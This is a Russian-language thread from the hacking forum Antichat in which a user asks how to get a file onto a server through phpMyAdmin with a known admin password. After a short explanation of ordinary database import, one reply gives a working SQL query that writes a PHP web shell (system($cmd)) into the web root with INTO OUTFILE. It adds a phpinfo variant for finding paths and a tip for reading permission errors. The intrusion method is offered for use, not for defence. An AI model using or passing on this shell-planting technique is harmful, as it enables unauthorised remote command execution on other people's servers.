HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
   
Закрытая тема
 
Опции темы Поиск в этой теме Опции просмотра

phpmyadmin
  #1  
Старый 27.11.2008, 18:08
sadfeel
Познающий
Регистрация: 05.11.2008
Сообщений: 79
С нами: 9217193

Репутация: 12
По умолчанию phpmyadmin

можно ли както залить файл на сервер через phpMyadmin если известен пас на админку? если да то как?

Последний раз редактировалось sadfeel; 27.11.2008 в 19:10..
 

  #2  
Старый 27.11.2008, 18:15
Rebz
Флудер
Регистрация: 08.11.2004
Сообщений: 3,395
С нами: 11317286

Репутация: 3876


По умолчанию

можно
встречный вопрос - юзал поиск?
 

  #3  
Старый 27.11.2008, 20:25
AkyHa_MaTaTa
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
С нами: 10077446

Репутация: 1020


По умолчанию

можно попробывать через мускуль(into out file), конечно если есть file priv и подходяшая дира(с возможностью записи).
 

  #4  
Старый 27.11.2008, 20:59
cash$$$
Banned
Регистрация: 06.01.2008
Сообщений: 413
С нами: 9655526

Репутация: 1334
По умолчанию

sadfeel

Если залить БД на сервер, то вариантов несколько;

Если БД данными не сильно наполнена! То у себя локально делаешь дамп структура+данные, в случае если у тебя структура не создана на хостере, иначе просто данные. Заходишь в phpmyadmin , выбираешь свою БД, кликаешь на sql-запрос, копируешь содержимое своего дампа в окно запроса, корректишь имя БД или хоста, ну и жмешь кнопку "Пошел".
Если БД заполнена данными конкретно. Делаешь дамп только структуры своей БД. Создаешь ее тем же phpmyadmin'ом у хостера. Делаешь у себя в локальной БД выгрузку данных обычным запросом: сколько таблиц, столько и файлов получишь. Потом эти файлы также можно загрузить в phpmyadmin, при помощи фичи - загрузка данных через файл.
Если хостер позволяет удаленно подключаться тем же MySQL Front или MySQL CC, то можно прямо с API любого все сделать.

Если залить шелл через PHPmyadmin, то можно попробывать зделать следующие:

если есть права на запись, выполняй запрос

Код:
SELECT '<?php system($cmd) ?>' FROM `table` INTO OUTFILE '/home/site/www/dir/shell.php'
/home/site/www/dir/shell.php- Подставляешь свое значение.

в phpmyadmin много способов узнать локальный путь например: какой-нибудь файл который обычно не вызывается на прямую а только инклудится, а поэтому можно попробовать select '<? phpinfo(); ?>' into outfile '/path_to_phpmyadmin/shell.php'

Если пишет #1045 - Access denied for user 'name'@'localhost' (using password: YES)

то значит нет прав на заливку.
 
Закрытая тема



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
PhpMyAdmin dimauz Уязвимости 21 26.01.2007 23:06
Уязвимости phpMyAdmin 2.6.0-pl2 yanus Уязвимости 1 13.03.2006 13:48
Как залить шелл через PhpMyAdmin? Buga Уязвимости CMS / форумов 15 16.02.2006 22:18
Залить remview.php через phpMyAdmin Grom PHP 8 05.02.2006 00:19
Как через phpmyadmin запрость данные пользователей ? Майор Уязвимости CMS / форумов 3 26.12.2004 02:44



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.